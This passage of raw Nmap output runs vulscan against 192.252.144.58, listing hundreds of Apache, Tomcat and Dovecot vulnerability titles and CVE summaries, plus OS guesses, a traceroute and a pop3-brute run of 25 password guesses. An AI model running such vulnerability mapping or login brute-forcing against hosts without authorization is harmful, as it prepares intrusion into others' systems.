16839| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
16840| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
16841| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
16842| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
16843| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
16844| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
16845| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
16846| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
16847| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
16848| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
16849| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
16850| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
16851| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
16852| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
16853| [40262] Apache HTTP Server mod_status refresh XSS
16854| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
16855| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
16856| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
16857| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
16858| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
16859| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
16860| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
16861| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
16862| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
16863| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
16864| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
16865| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
16866| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
16867| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
16868| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
16869| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
16870| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
16871| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
16872| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
16873| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
16874| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
16875| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
16876| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
16877| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
16878| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
16879| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
16880| [36080] Apache Tomcat JSP Examples Crafted URI XSS
16881| [36079] Apache Tomcat Manager Uploaded Filename XSS
16882| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
16883| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
16884| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
16885| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
16886| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
16887| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
16888| [34881] Apache Tomcat Malformed Accept-Language Header XSS
16889| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
16890| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
16891| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
16892| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
16893| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
16894| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
16895| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
16896| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
16897| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
16898| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
16899| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
16900| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
16901| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
16902| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
16903| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
16904| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
16905| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
16906| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
16907| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
16908| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
16909| [32724] Apache mod_python _filter_read Freed Memory Disclosure
16910| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
16911| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
16912| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
16913| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
16914| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
16915| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
16916| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
16917| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
16918| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
16919| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
16920| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
16921| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
16922| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
16923| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
16924| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
16925| [24365] Apache Struts Multiple Function Error Message XSS
16926| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
16927| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
16928| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
16929| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
16930| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
16931| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
16932| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
16933| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
16934| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
16935| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
16936| [22459] Apache Geronimo Error Page XSS
16937| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
16938| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
16939| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
16940| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
16941| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
16942| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
16943| [21021] Apache Struts Error Message XSS
16944| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
16945| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
16946| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
16947| [20439] Apache Tomcat Directory Listing Saturation DoS
16948| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
16949| [20285] Apache HTTP Server Log File Control Character Injection
16950| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
16951| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
16952| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
16953| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
16954| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
16955| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
16956| [19821] Apache Tomcat Malformed Post Request Information Disclosure
16957| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
16958| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
16959| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
16960| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
16961| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
16962| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
16963| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
16964| [18233] Apache HTTP Server htdigest user Variable Overfow
16965| [17738] Apache HTTP Server HTTP Request Smuggling
16966| [16586] Apache HTTP Server Win32 GET Overflow DoS
16967| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
16968| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
16969| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
16970| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
16971| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
16972| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
16973| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
16974| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
16975| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
16976| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
16977| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
16978| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
16979| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
16980| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
16981| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
16982| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
16983| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
16984| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
16985| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
16986| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
16987| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
16988| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
16989| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
16990| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
16991| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
16992| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
16993| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
16994| [13304] Apache Tomcat realPath.jsp Path Disclosure
16995| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
16996| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
16997| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
16998| [12848] Apache HTTP Server htdigest realm Variable Overflow
16999| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
17000| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
17001| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
17002| [12557] Apache HTTP Server prefork MPM accept Error DoS
17003| [12233] Apache Tomcat MS-DOS Device Name Request DoS
17004| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
17005| [12231] Apache Tomcat web.xml Arbitrary File Access
17006| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
17007| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
17008| [12178] Apache Jakarta Lucene results.jsp XSS
17009| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
17010| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
17011| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
17012| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
17013| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
17014| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
17015| [10471] Apache Xerces-C++ XML Parser DoS
17016| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
17017| [10068] Apache HTTP Server htpasswd Local Overflow
17018| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
17019| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
17020| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
17021| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
17022| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
17023| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
17024| [9717] Apache HTTP Server mod_cookies Cookie Overflow
17025| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
17026| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
17027| [9714] Apache Authentication Module Threaded MPM DoS
17028| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
17029| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
17030| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
17031| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
17032| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
17033| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
17034| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
17035| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
17036| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
17037| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
17038| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
17039| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
17040| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
17041| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
17042| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
17043| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
17044| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
17045| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
17046| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
17047| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
17048| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
17049| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
17050| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
17051| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
17052| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
17053| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
17054| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
17055| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
17056| [9208] Apache Tomcat .jsp Encoded Newline XSS
17057| [9204] Apache Tomcat ROOT Application XSS
17058| [9203] Apache Tomcat examples Application XSS
17059| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
17060| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
17061| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
17062| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
17063| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
17064| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
17065| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
17066| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
17067| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
17068| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
17069| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
17070| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
17071| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
17072| [7611] Apache HTTP Server mod_alias Local Overflow
17073| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
17074| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
17075| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
17076| [6882] Apache mod_python Malformed Query String Variant DoS
17077| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
17078| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
17079| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
17080| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
17081| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
17082| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
17083| [5526] Apache Tomcat Long .JSP URI Path Disclosure
17084| [5278] Apache Tomcat web.xml Restriction Bypass
17085| [5051] Apache Tomcat Null Character DoS
17086| [4973] Apache Tomcat servlet Mapping XSS
17087| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
17088| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
17089| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
17090| [4568] mod_survey For Apache ENV Tags SQL Injection
17091| [4553] Apache HTTP Server ApacheBench Overflow DoS
17092| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
17093| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
17094| [4383] Apache HTTP Server Socket Race Condition DoS
17095| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
17096| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
17097| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
17098| [4231] Apache Cocoon Error Page Server Path Disclosure
17099| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
17100| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
17101| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
17102| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
17103| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
17104| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
17105| [3322] mod_php for Apache HTTP Server Process Hijack
17106| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
17107| [2885] Apache mod_python Malformed Query String DoS
17108| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
17109| [2733] Apache HTTP Server mod_rewrite Local Overflow
17110| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
17111| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
17112| [2149] Apache::Gallery Privilege Escalation
17113| [2107] Apache HTTP Server mod_ssl Host: Header XSS
17114| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
17115| [1833] Apache HTTP Server Multiple Slash GET Request DoS
17116| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
17117| [872] Apache Tomcat Multiple Default Accounts
17118| [862] Apache HTTP Server SSI Error Page XSS
17119| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
17120| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
17121| [845] Apache Tomcat MSDOS Device XSS
17122| [844] Apache Tomcat Java Servlet Error Page XSS
17123| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
17124| [838] Apache HTTP Server Chunked Encoding Remote Overflow
17125| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
17126| [775] Apache mod_python Module Importing Privilege Function Execution
17127| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
17128| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
17129| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
17130| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
17131| [637] Apache HTTP Server UserDir Directive Username Enumeration
17132| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
17133| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
17134| [562] Apache HTTP Server mod_info /server-info Information Disclosure
17135| [561] Apache Web Servers mod_status /server-status Information Disclosure
17136| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
17137| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
17138| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
17139| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
17140| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
17141| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
17142| [376] Apache Tomcat contextAdmin Arbitrary File Access
17143| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
17144| [222] Apache HTTP Server test-cgi Arbitrary File Access
17145| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
17146| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
17147|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.10 - 3.12 (91%), Linux 4.4 (91%), Linux 4.9 (91%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.2 - 4.9 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 25.958 days (since Wed Oct 30 10:20:01 2019)
Network Distance: 17 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   134.54 ms 10.245.200.1
2   ...
3   134.61 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
4   134.60 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
5   139.74 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
6   158.58 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
7   167.57 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
8   167.61 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
9   171.18 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
10  163.18 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
11  257.46 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
12  258.97 ms 204.70.192.125
13  255.22 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
14  261.27 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
15  251.09 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
16  253.18 ms 64.89.38.2
17  251.56 ms 192.252.144.58

NSE: Script Post-scanning.
Initiating NSE at 08:19
Completed NSE at 08:19, 0.00s elapsed
Initiating NSE at 08:19
Completed NSE at 08:19, 0.00s elapsed
#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:19 EST
Nmap scan report for 192.252.144.58
Host is up (0.25s latency).

PORT    STATE SERVICE VERSION
110/tcp open  pop3    Dovecot pop3d
| pop3-brute:
|   Accounts: No valid accounts found
|   Statistics: Performed 25 guesses in 31 seconds, average tps: 0.8
|_  ERROR: Failed to connect.
|_pop3-capabilities: CAPA STLS TOP RESP-CODES UIDL PIPELINING SASL(PLAIN) USER AUTH-RESP-CODE
17196| vulscan: VulDB - https://vuldb.com:
17197| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
17198| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
17199| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
17200| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
17201| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
17202| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
17203| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
17204| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
17205| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
17206| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
17207| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
17208| [69835] Dovecot 2.2.0/2.2.1 denial of service
17209| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
17210| [65684] Dovecot up to 2.2.6 unknown vulnerability
17211| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
17212| [63692] Dovecot up to 2.0.15 spoofing
17213| [7062] Dovecot 2.1.10 mail-search.c denial of service
17214| [57517] Dovecot up to 2.0.12 Login directory traversal
17215| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
17216| [57515] Dovecot up to 2.0.12 Crash denial of service
17217| [54944] Dovecot up to 1.2.14 denial of service
17218| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
17219| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
17220| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
17221| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
17222| [53277] Dovecot up to 1.2.10 denial of service
17223| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
17224| [45256] Dovecot up to 1.1.5 directory traversal
17225| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
17226| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
17227| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
17228| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
17229| [40356] Dovecot 1.0.9 Cache unknown vulnerability
17230| [38222] Dovecot 1.0.2 directory traversal
17231| [36376] Dovecot up to 1.0.x directory traversal
17232| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
17233|
17234| MITRE CVE - https://cve.mitre.org:
17235| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
17236| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
17237| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
17238| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
17239| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
17240| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
17241| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
17242| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
